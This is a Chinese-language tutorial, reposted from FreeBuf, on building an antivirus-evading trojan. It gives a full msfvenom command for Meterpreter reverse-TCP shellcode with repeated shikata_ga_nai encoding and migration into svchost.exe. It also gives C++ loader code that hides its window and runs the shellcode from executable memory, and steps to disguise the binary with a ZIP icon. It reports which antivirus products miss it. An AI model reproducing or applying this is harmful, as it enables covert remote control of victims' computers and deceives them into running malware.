栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > C/C++/C#

MSF编码+VS编译木马免杀

C/C++/C# 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

MSF编码+VS编译木马免杀

MSF编码+VS编译木马免杀
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 15 -b 'x00' PrependMigrate=true PrependMIgrateProx=svchost.exe  -f c > /root/Desktop/shellcode.c

1.-e x86/shikata_ga_nai -i 15是用 -e x86/shikata_ga_hai编码15次
2.PrependMigrate=true PrependMIgrateProx=svchost.exe是使这个程序会默认迁移到svchost.exe进程(这是微软自带的一个进程)
3.还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。(需要设置RC4PASSWORD=)

执行上面代码后,桌面会有一个shellcode.c文件
将其移到 windows,用记事本打开会有 :unsigned char buf[] =”一长串数字”

接着我们用vs2022去开始编译木马

在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。

#include
#include
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")                        //去除窗口
unsigned char shellcode[]= (这里就是shellcode)
void main()
{
 LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 memcpy(Memory, shellcode, sizeof(shellcode));
 ((void(*)())Memory)();
}

《可能会出现的问题》

编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,再用电脑的搜索查找*.ico,找到 ZIP的图标找到你这个项目的文件夹下会有一个zip.ico文件,将zip.ico替换成icon1.ico,再次编译

再次编译的结果:


测试了一下效果,火绒是真的强,刚生成就被杀。电脑管家发现不了,所以确实能绕过一部分WAF

原文连接:
https://www.freebuf.com/sectool/166682.html?replytocom=247112

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/769164.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号